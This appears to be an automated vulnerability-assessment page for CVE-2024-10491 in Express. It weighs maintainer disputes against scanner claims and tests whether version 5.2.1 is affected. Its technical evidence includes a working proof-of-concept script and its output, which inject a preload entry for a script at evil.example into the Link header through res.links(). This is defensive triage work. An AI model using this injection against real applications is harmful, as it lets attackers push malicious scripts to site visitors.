← All assessments

CVE-2024-10491

pkg:npm/express@5.2.1

CVE: PUBLISHEDDISPUTED
Live runs are off.

Why this label

  1. evidence_sufficient 0.77 ≥ 0.50
  2. → DISPUTED: credible_dispute_exists 0.95 ≥ 0.60 and no stronger rule applied

Generated 2026-10-04 19:55 UTC · investigators anthropic/claude-sonnet-5.5 · judge typesafe-ai/jev

Claims

ClaimVerdictTechnically supportedCredibly disputed
The affected product is the Express package.
product · asserted by CVE description, NVD, GHSA, OSV
✓ supported0.970.05
NVD identifies affected versions as >=3.0.0 and <3.21.5.
versions · asserted by NVD
? disputed0.390.55
GHSA identifies affected versions as <=3.21.4.
versions · asserted by GHSA
✓ supported0.750.33
OSV identifies affected versions as <4.0.0-rc1.
versions · asserted by OSV
? disputed0.640.57
Exploitation requires no privileges.
auth · asserted by CVSS
· unverified0.600.06
The attack vector is network-based.
vector · asserted by CVSS
· unverified0.380.05
Attack complexity is high.
vector · asserted by CVSS
· unverified0.410.08
Exploitation requires no user interaction.
vector · asserted by CVSS
· unverified0.600.09
express@5.2.1 is affected by CVE-2024-10491
target · asserted by the scan or report under review
? disputed0.830.94

Technical evidence

Fix
Not identified
Vulnerable code
lib/response.js, res.links(): builds `<${url}>; rel="${rel}"` by string interpolation with no encoding or validation of `>`, `,`, `;` or `"`. Attacker-controlled link values can close the URL and add extra Link entries or params. No fix found; the code is unchanged in 3.21.2, 4.0.0, 4.21.2, 5.0.0-alpha.1 and 5.2.1.
PoC
Start an express app whose handler calls res.links({next: req.query.u}) with a crafted value. Print the Link response header and check for an injected extra entry (<https://evil.example/p.js>; rel="preload").
Script
const express=require(require('path').resolve(process.argv[2],'node_modules/express'));const http=require('http');
const app=express();
app.get('/',(q,r)=>{r.links({next:q.query.u});r.end('ok')});
const s=app.listen(0,()=>{
 const u='http://a/x>; rel="next", <https://evil.example/p.js>; rel="preload"; as="script';
 http.get({port:s.address().port,path:'/?u='+encodeURIComponent(u)},res=>{console.log(res.headers.link);s.close()});
});
// run: node poc.js v5.2.1
VersionRoleResult
5.2.1targetreproduced
Link: <http://a/x>; rel="next", <https://evil.example/p.js>; rel="preload"; as="script>; rel="next" (injected preload entry present)
3.21.2positive controlreproduced
Same injected Link header. 3.21.2 is the latest 3.x on npm.
4.21.2otherreproduced
Same injected Link header.
4.0.0otherreproduced
Same injected Link header. This is outside OSV's <4.0.0-rc1 range.
5.0.0-alpha.1otherreproduced
Same injected Link header.
3.21.5fixednot run
No such version on npm. 3.21.x releases stop at 3.21.2, so there is no fixed release to compare.

I did not read the issue thread or any maintainer stance. Only Link header injection was tested, not browser preload behavior. It needs an app that passes untrusted input into res.links. The behavior is unchanged across 3.x, 4.x and 5.x and no patch exists, so the advisory ranges do not track a code change. I did not fetch or read any commit diff.

Discourse evidence

Express maintainers say the issue affects only the 3.x line (EOL) and was patched in v4. They say any vendor flagging 4.x or 5.x is wrong. Sonatype's advisory deviation notice says all 4.x and 5.x versions are affected. Users report scanner hits on 4.21.x and 5.x. One user says they saw identical behaviour on 3.21.2 and 5.1.0. GHSA lists <=3.21.4 and patched 4.0.0-rc1, so 5.2.1 is outside that range.

  • maintainerUlisesGascondisputes target2024-12-13
    This vulnerability is relevant only for Express >=3.0.0-alpha1 <=3.21.2.
  • maintainerwesleytodddisputes target2025-01-06
    this does not impact express after version `3.21.2`. If Nexus or some other vendor thinks they have a new report or this impacts more than the verified range they should use our standard security reporting methods
  • maintainerwesleytodddisputes target2025-09-12
    This was patched in v4 and if you have a vendor who is reporting this specific CVE for anything other than the 3.x line of `express` they are incorrect.
  • scanner vendorcdavid15 (quoting Sonatype NexusIQ)supports target2025-01-06
    this vulnerability affects all available `4.x` and `5.x` versions.
  • scanner vendorlroal (quoting OSS Index)supports target2025-01-30
    Sonatype's research suggests that this CVE's details differ from those defined at NVD.
  • communitymadcorgisupports target2025-09-12
    I ran the scenario reported in the CVE and am seeing the exact same result between version 3.21.2 and 5.1.0. What exactly was fixed?
  • communitycdavid15disputes target2025-01-07
    this issue was indeed fixed after version `3.21.2` and is **NOT** a current vulnerability requiring a fix for `4.x` or `5.x`.
  • vuln dbGitHub Advisory Databasesupports c32024-12-19
    Affected versions <= 3.21.4 Patched versions 4.0.0-rc1
  • vuln dbGitHub Advisory Databasesupports c72024-12-19
    CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N
  • vuln dbGitHub Advisory Databasesupports c52024-12-19
    Attack vector Network Attack complexity High Privileges required None User interaction None
  • vuln dbGitHub Advisory Databasesupports c12024-12-19
    Express response.links function, allowing for arbitrary resource injection in the Link header
  • communityveselov-asdisputes target2024-12-27
    is the sca check swearing at version 4.21.1 mb a false positive?

Unresolved

  • Sonatype's reasoning and evidence for 4.x/5.x being affected was only seen second-hand; I did not fetch the OSS Index page.
  • The maintainer statements give inconsistent upper bounds (<=3.21.2 vs. GHSA <=3.21.4).
  • The NVD range (>=3.0.0 <3.21.5) and the OSV range (<4.0.0-rc1) were not independently fetched.
  • No maintainer statement addresses 5.2.1 specifically.
  • The madcorgi reproduction was not explained, and no maintainer answered what was fixed.

Jev scores

Bug exists in some version0.96
Target version affected0.82
Evidence sufficient0.77
Reproduced on target0.97
Patch addresses the issue0.16
Credible dispute exists0.95
Impact matches description0.78
Positive control reproduced0.96
Authority of dispute (0 none – 3 maintainer)2.99

Official record

A vulnerability has been identified in the Express response.links function, allowing for arbitrary resource injection in the Link header when unsanitized data is used. The issue arises from improper sanitization in `Link` header values, which can allow a combination of characters like `,`, `;`, and `<>` to preload malicious resources. This vulnerability is especially relevant for dynamic parameters.

SourceAffected rangesCovers target?
nvd>=3.0.0 <3.21.5no
ghsa<= 3.21.4no
osv<4.0.0-rc1no

OSV reports for this exact version: none · CVSS 4 MEDIUM · CWE-74

Evidence quality

  • ✗Fix commit or release identified
  • ✓Vulnerable code path identified
  • ✓Positive control reproduced
  • ✓Target version tested
  • ✓Maintainer or vendor statement found
  • ✓Sources agree on whether the target is in range

Run history

  • 2026-10-04 19:53 · succeeded · DISPUTED
  • 2026-10-04 19:52 · failed
  • 2026-10-04 19:49 · failed